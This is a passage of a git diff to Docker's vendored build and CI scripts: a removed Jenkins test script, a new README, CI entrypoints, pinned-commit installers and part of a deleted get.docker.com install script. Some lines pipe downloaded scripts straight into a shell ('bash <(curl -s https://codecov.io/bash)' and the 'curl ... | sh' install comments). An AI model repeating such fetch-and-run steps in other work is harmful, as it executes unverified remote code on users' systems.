-	! if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then
-		echo WARN: There were some leftover containers. Cleaning them up.
-		! docker rm -f $(docker ps -aq)
-	fi
-	
-    # Force remove the image if it exists
-	! docker rmi -f "docker-$COMMITHASH" &>/dev/null
-fi
-
-# Provide the docker version for debugging purposes. If these fail, game over. 
-# as the Linux box isn't responding for some reason.
-if [ $ec -eq 0 ]; then
-	echo INFO: Docker version and info of the outer daemon on the Linux node
-	echo
-	docker version
-	ec=$?
-	if [ 0 -ne $ec ]; then
-		echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?"
-	fi
-	echo
-fi
-
-# Same as above, but docker info
-if [ $ec -eq 0 ]; then
-	echo
-	docker info
-	ec=$?
-	if [ 0 -ne $ec ]; then
-		echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?"
-	fi
-	echo
-fi
-
-# build the daemon image
-if [ $ec -eq 0 ]; then
-	echo "INFO: Running docker build on Linux host at $DOCKER_HOST"
-	if [ $splitBinary -eq 0 ]; then
-		set -x
-		docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" .
-    cat <<EOF | docker build --rm --force-rm -t "docker:$COMMITHASH" -
-FROM docker:$COMMITHASH
-RUN hack/make.sh binary
-RUN cp bundles/latest/binary/docker /bin/docker 
-CMD docker daemon -D -H tcp://0.0.0.0:$port_inner $daemon_extra_args
-EOF
-	else
-		set -x
-		docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" .
-    cat <<EOF | docker build --rm --force-rm -t "docker:$COMMITHASH" -
-FROM docker:$COMMITHASH
-RUN hack/make.sh binary
-RUN cp bundles/latest/binary-daemon/dockerd /bin/dockerd 
-CMD dockerd -D -H tcp://0.0.0.0:$port_inner $daemon_extra_args
-EOF
-
-	fi
-	ec=$?
-	set +x
-	if [ 0 -ne $ec ]; then
-		echo "ERROR: docker build failed"
-	fi
-fi
-
-# Start the docker-in-docker daemon from the image we just built
-if [ $ec -eq 0 ]; then
-	echo "INFO: Starting build of a Linux daemon to test against, and starting it..."
-	set -x
-	# aufs in aufs is faster than vfs in aufs
-	docker run -d $run_extra_args -e DOCKER_GRAPHDRIVER=aufs --pid host --privileged --name "docker-$COMMITHASH" --net host "docker:$COMMITHASH"
-	ec=$?
-	set +x
-	if [ 0 -ne $ec ]; then
-	    	echo "ERROR: Failed to compile and start the linux daemon"
-	fi
-fi
-
-# Build locally.
-if [ $ec -eq 0 ]; then
-	echo "INFO: Starting local build of Windows binary..."
-	set -x
-	export TIMEOUT="120m"
-	export DOCKER_HOST="tcp://$ip:$port_inner"
-    # This can be removed
-	export DOCKER_TEST_HOST="tcp://$ip:$port_inner"
-	unset DOCKER_CLIENTONLY
-	export DOCKER_REMOTE_DAEMON=1
-	hack/make.sh binary 
-	ec=$?
-	set +x
-	if [ 0 -ne $ec ]; then
-	    echo "ERROR: Build of binary on Windows failed"
-	fi
-fi
-
-# Make a local copy of the built binary and ensure that is first in our path
-if [ $ec -eq 0 ]; then
-	VERSION=$(< ./VERSION)
-	if [ $splitBinary -eq 0 ]; then
-		cp bundles/$VERSION/binary/docker.exe $TEMP
-	else
-		cp bundles/$VERSION/binary-client/docker.exe $TEMP
-	fi
-	ec=$?
-	if [ 0 -ne $ec ]; then
-		echo "ERROR: Failed to copy built binary to $TEMP"
-	fi
-	export PATH=$TEMP:$PATH
-fi
-
-# Run the integration tests
-if [ $ec -eq 0 ]; then	
-	echo "INFO: Running Integration tests..."
-	set -x
-	export DOCKER_TEST_TLS_VERIFY="$DOCKER_TLS_VERIFY"
-	export DOCKER_TEST_CERT_PATH="$DOCKER_CERT_PATH"
-	#export TESTFLAGS='-check.vv'
-	hack/make.sh test-integration-cli
-	ec=$?
-	set +x
-	if [ 0 -ne $ec ]; then
-		echo "ERROR: CLI test failed."
-		# Next line is useful, but very long winded if included
-		docker -H=$MAIN_DOCKER_HOST logs --tail 100 "docker-$COMMITHASH"
-    fi
-fi
-
-# Tidy up any temporary files from the CI run
-if [ ! -z $COMMITHASH ]; then
-	rm -rf $TEMP
-fi
-
-# CI Integrity check - ensure we are using the same version of go as present in the Dockerfile
-GOVER_DOCKERFILE=`grep 'ENV GO_VERSION' Dockerfile | awk '{print $3}'`
-GOVER_INSTALLED=`go version | awk '{print $3}'`
-if [ "${GOVER_INSTALLED:2}" != "$GOVER_DOCKERFILE" ]; then
-	#ec=1  # Uncomment to make CI fail once all nodes are updated.
-	echo
-	echo "---------------------------------------------------------------------------"
-	echo "WARN: CI should be using go version $GOVER_DOCKERFILE, but is using ${GOVER_INSTALLED:2}"
-	echo "      Please ping #docker-maintainers on IRC to get this CI server updated."
-	echo "---------------------------------------------------------------------------"
-	echo
-fi
-
-# Check the Linux box is running a matching version of docker
-if [ "$uniques" -ne 1 ]; then
-    ec=0  # Uncomment to make CI fail once all nodes are updated.
-	echo
-	echo "---------------------------------------------------------------------------"
-	echo "ERROR: This CI node is not running the same version of docker as the daemon."
-	echo "       This is a CI configuration issue."
-	echo "---------------------------------------------------------------------------"
-	echo
-fi
-
-# Tell the user how we did.
-if [ $ec -eq 0 ]; then
-	echo INFO: Completed successfully at `date`. 
-else
-	echo ERROR: Failed with exitcode $ec at `date`.
-fi
-exit $ec
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/readme.md b/vendor/github.com/docker/docker/hack/Jenkins/readme.md
deleted file mode 100644
index ace3f3f563..0000000000
--- a/vendor/github.com/docker/docker/hack/Jenkins/readme.md
+++ /dev/null
@@ -1,3 +0,0 @@
-These files under this directory are for reference only. 
-
-They are used by Jenkins for CI runs.
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/README.md b/vendor/github.com/docker/docker/hack/README.md
new file mode 100644
index 0000000000..a9a948ee2b
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/README.md
@@ -0,0 +1,55 @@
+## About
+
+This directory contains a collection of scripts used to build and manage this
+repository. If there are any issues regarding the intention of a particular
+script (or even part of a certain script), please reach out to us.
+It may help us either refine our current scripts, or add on new ones
+that are appropriate for a given use case.
+
+## DinD (dind.sh)
+
+DinD is a wrapper script which allows Docker to be run inside a Docker
+container. DinD requires the container to
+be run with privileged mode enabled.
+
+## Generate Authors (generate-authors.sh)
+
+Generates AUTHORS; a file with all the names and corresponding emails of
+individual contributors. AUTHORS can be found in the home directory of
+this repository.
+
+## Make
+
+There are two make files, each with different extensions. Neither are supposed
+to be called directly; only invoke `make`. Both scripts run inside a Docker
+container.
+
+### make.ps1
+
+- The Windows native build script that uses PowerShell semantics; it is limited
+unlike `hack\make.sh` since it does not provide support for the full set of
+operations provided by the Linux counterpart, `make.sh`. However, `make.ps1`
+does provide support for local Windows development and Windows to Windows CI.
+More information is found within `make.ps1` by the author, @jhowardmsft
+
+### make.sh
+
+- Referenced via `make test` when running tests on a local machine,
+or directly referenced when running tests inside a Docker development container.  
+- When running on a local machine, `make test` to run all tests found in
+`test`, `test-unit`, `test-integration`, and `test-docker-py` on
+your local machine. The default timeout is set in `make.sh` to 60 minutes
+(`${TIMEOUT:=60m}`), since it currently takes up to an hour to run
+all of the tests.
+- When running inside a Docker development container, `hack/make.sh` does
+not have a single target that runs all the tests. You need to provide a
+single command line with multiple targets that performs the same thing.
+An example referenced from [Run targets inside a development container](https://docs.docker.com/opensource/project/test-and-docs/#run-targets-inside-a-development-container): `root@5f8630b873fe:/go/src/github.com/moby/moby# hack/make.sh dynbinary binary cross test-unit test-integration test-docker-py`
+- For more information related to testing outside the scope of this README,
+refer to
+[Run tests and test documentation](https://docs.docker.com/opensource/project/test-and-docs/)
+
+## Vendor (vendor.sh)
+
+A shell script that is a wrapper around Vndr. For information on how to use
+this, please refer to [vndr's README](https://github.com/LK4D4/vndr/blob/master/README.md)
diff --git a/vendor/github.com/docker/docker/hack/ci/arm b/vendor/github.com/docker/docker/hack/ci/arm
new file mode 100755
index 0000000000..e60332a608
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/ci/arm
@@ -0,0 +1,10 @@
+#!/usr/bin/env bash
+# Entrypoint for jenkins arm CI build
+set -eu -o pipefail
+
+hack/test/unit
+
+hack/make.sh \
+	binary-daemon \
+	dynbinary \
+	test-integration
diff --git a/vendor/github.com/docker/docker/hack/ci/experimental b/vendor/github.com/docker/docker/hack/ci/experimental
new file mode 100755
index 0000000000..9ccbc8425f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/ci/experimental
@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+# Entrypoint for jenkins experimental CI
+set -eu -o pipefail
+
+export DOCKER_EXPERIMENTAL=y
+
+hack/make.sh \
+	binary-daemon \
+	test-integration
diff --git a/vendor/github.com/docker/docker/hack/ci/janky b/vendor/github.com/docker/docker/hack/ci/janky
new file mode 100755
index 0000000000..f2bdfbf326
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/ci/janky
@@ -0,0 +1,17 @@
+#!/usr/bin/env bash
+# Entrypoint for jenkins janky CI build
+set -eu -o pipefail
+
+hack/validate/default
+hack/test/unit
+bash <(curl -s https://codecov.io/bash) \
+    -f coverage.txt \
+    -C "$GIT_SHA1" || \
+    echo 'Codecov failed to upload'
+
+hack/make.sh \
+	binary-daemon \
+	dynbinary \
+	test-docker-py \
+	test-integration \
+	cross
diff --git a/vendor/github.com/docker/docker/hack/ci/powerpc b/vendor/github.com/docker/docker/hack/ci/powerpc
new file mode 100755
index 0000000000..c36cf37dbf
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/ci/powerpc
@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+# Entrypoint for jenkins powerpc CI build
+set -eu -o pipefail
+
+hack/test/unit
+hack/make.sh dynbinary test-integration
diff --git a/vendor/github.com/docker/docker/hack/ci/z b/vendor/github.com/docker/docker/hack/ci/z
new file mode 100755
index 0000000000..5ba868e816
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/ci/z
@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+# Entrypoint for jenkins s390x (z) CI build
+set -eu -o pipefail
+
+hack/test/unit
+hack/make.sh dynbinary test-integration
diff --git a/vendor/github.com/docker/docker/hack/dind b/vendor/github.com/docker/docker/hack/dind
index 082c3d31fe..3254f9dbe7 100755
--- a/vendor/github.com/docker/docker/hack/dind
+++ b/vendor/github.com/docker/docker/hack/dind
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 # DinD: a wrapper script which allows docker to be run inside a docker container.
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits b/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits
deleted file mode 100755
index 8dfcca3946..0000000000
--- a/vendor/github.com/docker/docker/hack/dockerfile/binaries-commits
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/bin/sh
-
-TOMLV_COMMIT=9baf8a8a9f2ed20a8e54160840c492f937eeaf9a
-
-# When updating RUNC_COMMIT, also update runc in vendor.conf accordingly
-RUNC_COMMIT=9df8b306d01f59d3a8029be411de015b7304dd8f
-CONTAINERD_COMMIT=aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1
-TINI_COMMIT=949e6facb77383876aeff8a6944dde66b3089574
-LIBNETWORK_COMMIT=0f534354b813003a754606689722fe253101bc4e
-VNDR_COMMIT=f56bd4504b4fad07a357913687fb652ee54bb3b0
-BINDATA_COMMIT=a0ff2567cfb70903282db057e799fd826784d41d
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh b/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh
deleted file mode 100755
index 64f2b57da1..0000000000
--- a/vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh
+++ /dev/null
@@ -1,123 +0,0 @@
-#!/bin/sh
-set -e
-set -x
-
-. $(dirname "$0")/binaries-commits
-
-RM_GOPATH=0
-
-TMP_GOPATH=${TMP_GOPATH:-""}
-
-if [ -z "$TMP_GOPATH" ]; then
-	export GOPATH="$(mktemp -d)"
-	RM_GOPATH=1
-else
-	export GOPATH="$TMP_GOPATH"
-fi
-
-# Do not build with ambient capabilities support
-RUNC_BUILDTAGS="${RUNC_BUILDTAGS:-"seccomp apparmor selinux"}"
-
-install_runc() {
-	echo "Install runc version $RUNC_COMMIT"
-	git clone https://github.com/docker/runc.git "$GOPATH/src/github.com/opencontainers/runc"
-	cd "$GOPATH/src/github.com/opencontainers/runc"
-	git checkout -q "$RUNC_COMMIT"
-	make BUILDTAGS="$RUNC_BUILDTAGS" $1
-	cp runc /usr/local/bin/docker-runc
-}
-
-install_containerd() {
-	echo "Install containerd version $CONTAINERD_COMMIT"
-	git clone https://github.com/docker/containerd.git "$GOPATH/src/github.com/docker/containerd"
-	cd "$GOPATH/src/github.com/docker/containerd"
-	git checkout -q "$CONTAINERD_COMMIT"
-	make $1
-	cp bin/containerd /usr/local/bin/docker-containerd
-	cp bin/containerd-shim /usr/local/bin/docker-containerd-shim
-	cp bin/ctr /usr/local/bin/docker-containerd-ctr
-}
-
-install_proxy() {
-	echo "Install docker-proxy version $LIBNETWORK_COMMIT"
-	git clone https://github.com/docker/libnetwork.git "$GOPATH/src/github.com/docker/libnetwork"
-	cd "$GOPATH/src/github.com/docker/libnetwork"
-	git checkout -q "$LIBNETWORK_COMMIT"
-	go build -ldflags="$PROXY_LDFLAGS" -o /usr/local/bin/docker-proxy github.com/docker/libnetwork/cmd/proxy
-}
-
-install_bindata() {
-    echo "Install go-bindata version $BINDATA_COMMIT"
-    git clone https://github.com/jteeuwen/go-bindata "$GOPATH/src/github.com/jteeuwen/go-bindata"
-    cd $GOPATH/src/github.com/jteeuwen/go-bindata
-    git checkout -q "$BINDATA_COMMIT"
-	go build -o /usr/local/bin/go-bindata github.com/jteeuwen/go-bindata/go-bindata
-}
-
-for prog in "$@"
-do
-	case $prog in
-		tomlv)
-			echo "Install tomlv version $TOMLV_COMMIT"
-			git clone https://github.com/BurntSushi/toml.git "$GOPATH/src/github.com/BurntSushi/toml"
-			cd "$GOPATH/src/github.com/BurntSushi/toml" && git checkout -q "$TOMLV_COMMIT"
-			go build -v -o /usr/local/bin/tomlv github.com/BurntSushi/toml/cmd/tomlv
-			;;
-
-		runc)
-			install_runc static
-			;;
-
-		runc-dynamic)
-			install_runc
-			;;
-
-		containerd)
-			install_containerd static
-			;;
-
-		containerd-dynamic)
-			install_containerd
-			;;
-
-		tini)
-			echo "Install tini version $TINI_COMMIT"
-			git clone https://github.com/krallin/tini.git "$GOPATH/tini"
-			cd "$GOPATH/tini"
-			git checkout -q "$TINI_COMMIT"
-			cmake .
-			make tini-static
-			cp tini-static /usr/local/bin/docker-init
-			;;
-
-		proxy)
-			export CGO_ENABLED=0
-			install_proxy
-			;;
-
-		proxy-dynamic)
-			PROXY_LDFLAGS="-linkmode=external" install_proxy
-			;;
-
-		vndr)
-			echo "Install vndr version $VNDR_COMMIT"
-			git clone https://github.com/LK4D4/vndr.git "$GOPATH/src/github.com/LK4D4/vndr"
-			cd "$GOPATH/src/github.com/LK4D4/vndr"
-			git checkout -q "$VNDR_COMMIT"
-			go build -v -o /usr/local/bin/vndr .
-			;;
-
-        bindata)
-            install_bindata
-            ;;
-
-		*)
-			echo echo "Usage: $0 [tomlv|runc|containerd|tini|proxy]"
-			exit 1
-
-	esac
-done
-
-if [ $RM_GOPATH -eq 1 ]; then
-	rm -rf "$GOPATH"
-fi
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/containerd.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/containerd.installer
new file mode 100755
index 0000000000..2c0502e098
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/containerd.installer
@@ -0,0 +1,36 @@
+#!/bin/sh
+
+
+# containerd is also pinned in vendor.conf. When updating the binary
+# version you may also need to update the vendor version to pick up bug
+# fixes or new APIs.
+CONTAINERD_COMMIT=395068d2b7256518259816ae19e45824b15da071 # v1.1.1-rc.0
+
+install_containerd() {
+	echo "Install containerd version $CONTAINERD_COMMIT"
+	git clone https://github.com/containerd/containerd.git "$GOPATH/src/github.com/containerd/containerd"
+	cd "$GOPATH/src/github.com/containerd/containerd"
+	git checkout -q "$CONTAINERD_COMMIT"
+
+	(
+
+		export BUILDTAGS='static_build netgo'
+		export EXTRA_FLAGS='-buildmode=pie'
+		export EXTRA_LDFLAGS='-extldflags "-fno-PIC -static"'
+
+		# Reset build flags to nothing if we want a dynbinary
+		if [ "$1" == "dynamic" ]; then
+			export BUILDTAGS=''
+			export EXTRA_FLAGS=''
+			export EXTRA_LDFLAGS=''
+		fi
+
+		make
+	)
+
+	mkdir -p ${PREFIX}
+
+	cp bin/containerd ${PREFIX}/docker-containerd
+	cp bin/containerd-shim ${PREFIX}/docker-containerd-shim
+	cp bin/ctr ${PREFIX}/docker-containerd-ctr
+}
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/dockercli.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/dockercli.installer
new file mode 100755
index 0000000000..ae3aa0dd45
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/dockercli.installer
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+DOCKERCLI_CHANNEL=${DOCKERCLI_CHANNEL:-edge}
+DOCKERCLI_VERSION=${DOCKERCLI_VERSION:-17.06.0-ce}
+
+install_dockercli() {
+	echo "Install docker/cli version $DOCKERCLI_VERSION from $DOCKERCLI_CHANNEL"
+
+	arch=$(uname -m)
+	# No official release of these platforms
+	if [[ "$arch" != "x86_64" ]] && [[ "$arch" != "s390x" ]]; then
+		build_dockercli
+		return
+	fi
+
+	url=https://download.docker.com/linux/static
+	curl -Ls $url/$DOCKERCLI_CHANNEL/$arch/docker-$DOCKERCLI_VERSION.tgz | \
+	tar -xz docker/docker
+	mkdir -p ${PREFIX}
+	mv docker/docker ${PREFIX}/
+	rmdir docker
+}
+
+build_dockercli() {
+	git clone https://github.com/docker/docker-ce "$GOPATH/tmp/docker-ce"
+	cd "$GOPATH/tmp/docker-ce"
+	git checkout -q "v$DOCKERCLI_VERSION"
+	mkdir -p "$GOPATH/src/github.com/docker"
+	mv components/cli "$GOPATH/src/github.com/docker/cli"
+	go build -buildmode=pie -o ${PREFIX}/docker github.com/docker/cli/cmd/docker
+}
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/gometalinter.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/gometalinter.installer
new file mode 100755
index 0000000000..13500e1c89
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/gometalinter.installer
@@ -0,0 +1,12 @@
+#!/bin/sh
+
+GOMETALINTER_COMMIT=bfcc1d6942136fd86eb6f1a6fb328de8398fbd80
+
+install_gometalinter() {
+	echo "Installing gometalinter version $GOMETALINTER_COMMIT"
+	go get -d github.com/alecthomas/gometalinter
+	cd "$GOPATH/src/github.com/alecthomas/gometalinter"
+	git checkout -q "$GOMETALINTER_COMMIT"
+	go build -buildmode=pie -o ${PREFIX}/gometalinter github.com/alecthomas/gometalinter
+	GOBIN=${PREFIX} ${PREFIX}/gometalinter --install
+}
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/install.sh b/vendor/github.com/docker/docker/hack/dockerfile/install/install.sh
new file mode 100755
index 0000000000..a0ff09da55
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/install.sh
@@ -0,0 +1,30 @@
+#!/bin/bash
+
+set -e
+set -x
+
+RM_GOPATH=0
+
+TMP_GOPATH=${TMP_GOPATH:-""}
+
+: ${PREFIX:="/usr/local/bin"}
+
+if [ -z "$TMP_GOPATH" ]; then
+	export GOPATH="$(mktemp -d)"
+	RM_GOPATH=1
+else
+	export GOPATH="$TMP_GOPATH"
+fi
+
+dir="$(dirname $0)"
+
+bin=$1
+shift
+
+if [ ! -f "${dir}/${bin}.installer" ]; then
+	echo "Could not find installer for \"$bin\""
+	exit 1
+fi
+
+. $dir/$bin.installer
+install_$bin "$@"
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/proxy.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/proxy.installer
new file mode 100755
index 0000000000..00c2f1dd05
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/proxy.installer
@@ -0,0 +1,38 @@
+#!/bin/sh
+
+# LIBNETWORK_COMMIT is used to build the docker-userland-proxy binary. When
+# updating the binary version, consider updating github.com/docker/libnetwork
+# in vendor.conf accordingly
+LIBNETWORK_COMMIT=19279f0492417475b6bfbd0aa529f73e8f178fb5
+
+install_proxy() {
+	case "$1" in
+		"dynamic")
+			install_proxy_dynamic
+			return
+			;;
+		"")
+			export CGO_ENABLED=0
+			_install_proxy
+			;;
+		*)
+			echo 'Usage: $0 [dynamic]'
+			;;
+	esac
+}
+
+install_proxy_dynamic() {
+	export PROXY_LDFLAGS="-linkmode=external" install_proxy
+	export BUILD_MODE="-buildmode=pie"
+	_install_proxy
+}
+
+_install_proxy() {
+	echo "Install docker-proxy version $LIBNETWORK_COMMIT"
+	git clone https://github.com/docker/libnetwork.git "$GOPATH/src/github.com/docker/libnetwork"
+	cd "$GOPATH/src/github.com/docker/libnetwork"
+	git checkout -q "$LIBNETWORK_COMMIT"
+	go build $BUILD_MODE -ldflags="$PROXY_LDFLAGS" -o ${PREFIX}/docker-proxy github.com/docker/libnetwork/cmd/proxy
+}
+
+
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/runc.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/runc.installer
new file mode 100755
index 0000000000..62263b3c03
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/runc.installer
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# When updating RUNC_COMMIT, also update runc in vendor.conf accordingly
+RUNC_COMMIT=69663f0bd4b60df09991c08812a60108003fa340
+
+install_runc() {
+	# Do not build with ambient capabilities support
+	RUNC_BUILDTAGS="${RUNC_BUILDTAGS:-"seccomp apparmor selinux"}"
+
+	echo "Install runc version $RUNC_COMMIT"
+	git clone https://github.com/opencontainers/runc.git "$GOPATH/src/github.com/opencontainers/runc"
+	cd "$GOPATH/src/github.com/opencontainers/runc"
+	git checkout -q "$RUNC_COMMIT"
+	if [ -z "$1" ]; then
+		target=static
+	else
+		target="$1"
+	fi
+	make BUILDTAGS="$RUNC_BUILDTAGS" "$target"
+	mkdir -p ${PREFIX}
+	cp runc ${PREFIX}/docker-runc
+}
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/tini.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/tini.installer
new file mode 100755
index 0000000000..34f43f15f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/tini.installer
@@ -0,0 +1,14 @@
+#!/bin/sh
+
+TINI_COMMIT=fec3683b971d9c3ef73f284f176672c44b448662 # v0.18.0
+
+install_tini() {
+	echo "Install tini version $TINI_COMMIT"
+	git clone https://github.com/krallin/tini.git "$GOPATH/tini"
+	cd "$GOPATH/tini"
+	git checkout -q "$TINI_COMMIT"
+	cmake .
+	make tini-static
+	mkdir -p ${PREFIX}
+	cp tini-static ${PREFIX}/docker-init
+}
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/tomlv.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/tomlv.installer
new file mode 100755
index 0000000000..c926454f22
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/tomlv.installer
@@ -0,0 +1,12 @@
+#!/bin/sh
+
+# When updating TOMLV_COMMIT, consider updating github.com/BurntSushi/toml
+# in vendor.conf accordingly
+TOMLV_COMMIT=a368813c5e648fee92e5f6c30e3944ff9d5e8895
+
+install_tomlv() {
+	echo "Install tomlv version $TOMLV_COMMIT"
+	git clone https://github.com/BurntSushi/toml.git "$GOPATH/src/github.com/BurntSushi/toml"
+	cd "$GOPATH/src/github.com/BurntSushi/toml" && git checkout -q "$TOMLV_COMMIT"
+	go build -v -buildmode=pie -o ${PREFIX}/tomlv github.com/BurntSushi/toml/cmd/tomlv
+}
diff --git a/vendor/github.com/docker/docker/hack/dockerfile/install/vndr.installer b/vendor/github.com/docker/docker/hack/dockerfile/install/vndr.installer
new file mode 100755
index 0000000000..1d30eecc38
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dockerfile/install/vndr.installer
@@ -0,0 +1,11 @@
+#!/bin/sh
+
+VNDR_COMMIT=a6e196d8b4b0cbbdc29aebdb20c59ac6926bb384
+
+install_vndr() {
+	echo "Install vndr version $VNDR_COMMIT"
+	git clone https://github.com/LK4D4/vndr.git "$GOPATH/src/github.com/LK4D4/vndr"
+	cd "$GOPATH/src/github.com/LK4D4/vndr"
+	git checkout -q "$VNDR_COMMIT"
+	go build -buildmode=pie -v -o ${PREFIX}/vndr .
+}
diff --git a/vendor/github.com/docker/docker/hack/generate-authors.sh b/vendor/github.com/docker/docker/hack/generate-authors.sh
index e78a97f962..680bdb7b3f 100755
--- a/vendor/github.com/docker/docker/hack/generate-authors.sh
+++ b/vendor/github.com/docker/docker/hack/generate-authors.sh
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 cd "$(dirname "$(readlink -f "$BASH_SOURCE")")/.."
diff --git a/vendor/github.com/docker/docker/hack/generate-swagger-api.sh b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh
index a8e9f818a7..a01a57387a 100755
--- a/vendor/github.com/docker/docker/hack/generate-swagger-api.sh
+++ b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh
@@ -3,20 +3,25 @@ set -eu
 
 swagger generate model -f api/swagger.yaml \
     -t api -m types --skip-validator -C api/swagger-gen.yaml \
-    -n Volume \
-    -n Port \
-    -n ImageSummary \
-    -n Plugin -n PluginDevice -n PluginMount -n PluginEnv -n PluginInterfaceType \
     -n ErrorResponse \
+    -n GraphDriverData \
     -n IdResponse \
-    -n ServiceUpdateResponse
+    -n ImageDeleteResponseItem \
+    -n ImageSummary \
+    -n Plugin -n PluginDevice -n PluginMount -n PluginEnv -n PluginInterfaceType \
+    -n Port \
+    -n ServiceUpdateResponse \
+    -n Volume
 
 swagger generate operation -f api/swagger.yaml \
     -t api -a types -m types -C api/swagger-gen.yaml \
     -T api/templates --skip-responses --skip-parameters --skip-validator \
-    -n VolumesList \
-    -n VolumesCreate \
+    -n Authenticate \
+    -n ContainerChanges \
     -n ContainerCreate \
+    -n ContainerTop \
     -n ContainerUpdate \
-    -n Authenticate \
-    -n ContainerWait
+    -n ContainerWait \
+    -n ImageHistory \
+    -n VolumeCreate \
+    -n VolumeList
diff --git a/vendor/github.com/docker/docker/hack/install.sh b/vendor/github.com/docker/docker/hack/install.sh
deleted file mode 100644
index cc20d69396..0000000000
--- a/vendor/github.com/docker/docker/hack/install.sh
+++ /dev/null
@@ -1,484 +0,0 @@
-#!/bin/sh
-set -e
-#
-# This script is meant for quick & easy install via:
-#   'curl -sSL https://get.docker.com/ | sh'
-# or:
-#   'wget -qO- https://get.docker.com/ | sh'
-#
-# For test builds (ie. release candidates):
-#   'curl -fsSL https://test.docker.com/ | sh'
-# or:
-#   'wget -qO- https://test.docker.com/ | sh'
-#
-# For experimental builds:
-#   'curl -fsSL https://experimental.docker.com/ | sh'
-# or:
-#   'wget -qO- https://experimental.docker.com/ | sh'
-#
-# Docker Maintainers:
-#   To update this script on https://get.docker.com,
-#   use hack/release.sh during a normal release,
-#   or the following one-liner for script hotfixes:
-#     aws s3 cp --acl public-read hack/install.sh s3://get.docker.com/index
-#
-
-url="https://get.docker.com/"
-apt_url="https://apt.dockerproject.org"
-yum_url="https://yum.dockerproject.org"
-gpg_fingerprint="58118E89F3A912897C070ADBF76221572C52609D"
-
-key_servers="
-ha.pool.sks-keyservers.net
-pgp.mit.edu
-keyserver.ubuntu.com
-"
-
-mirror=''
-while [ $# -gt 0 ]; do
-	case "$1" in
-		--mirror)
-			mirror="$2"
-			shift
-			;;
-		*)
-			echo "Illegal option $1"
-			;;
-	esac
-	shift $(( $# > 0 ? 1 : 0 ))
-done
-
-case "$mirror" in
-	AzureChinaCloud)
-		apt_url="https://mirror.azure.cn/docker-engine/apt"
-		yum_url="https://mirror.azure.cn/docker-engine/yum"
-		;;
-esac
-
-command_exists() {
-	command -v "$@" > /dev/null 2>&1
-}
-
-echo_docker_as_nonroot() {
-	if command_exists docker && [ -e /var/run/docker.sock ]; then
-		(
-			set -x
-			$sh_c 'docker version'
-		) || true
-	fi
-	your_user=your-user
-	[ "$user" != 'root' ] && your_user="$user"
-	# intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output
-	cat <<-EOF
-
-	If you would like to use Docker as a non-root user, you should now consider
-	adding your user to the "docker" group with something like:
-
-	  sudo usermod -aG docker $your_user
-
-	Remember that you will have to log out and back in for this to take effect!
-
-	EOF
-}
-
-# Check if this is a forked Linux distro
-check_forked() {
-
-	# Check for lsb_release command existence, it usually exists in forked distros
-	if command_exists lsb_release; then
-		# Check if the `-u` option is supported
-		set +e
-		lsb_release -a -u > /dev/null 2>&1
-		lsb_release_exit_code=$?
-		set -e
-
-		# Check if the command has exited successfully, it means we're in a forked distro
-		if [ "$lsb_release_exit_code" = "0" ]; then
-			# Print info about current distro
-			cat <<-EOF
-			You're using '$lsb_dist' version '$dist_version'.
-			EOF
-
-			# Get the upstream release info
-			lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[[:space:]]')
